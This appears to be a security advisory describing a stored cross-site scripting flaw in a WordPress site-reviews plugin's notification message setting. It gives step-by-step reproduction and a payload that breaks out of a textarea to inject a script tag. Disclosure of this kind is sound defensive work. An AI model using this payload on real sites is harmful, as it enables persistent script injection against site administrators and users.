The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
1. Login as Admin.
2. Go to http://vulnerable-site.tld/wp-admin/edit.php?post_type=site-review&page=glsr-settings&tab=general
3. Make some changes in the `schema` tab and intercept the request.
4. The form will have the parameter `site_reviews_v6[settings][general][notification_message]`
5. Insert the following payload in it
```
<strong>A new {review_rating}-star review has been submitted:</strong>
</textarea><script>alert(1)</script>
{review_title}
{review_content}
{review_author} <{review_email}> - {review_ip}
{review_link}
```
6. Hit send and the xss payload will be saved and will be triggered whenever the settings page is open.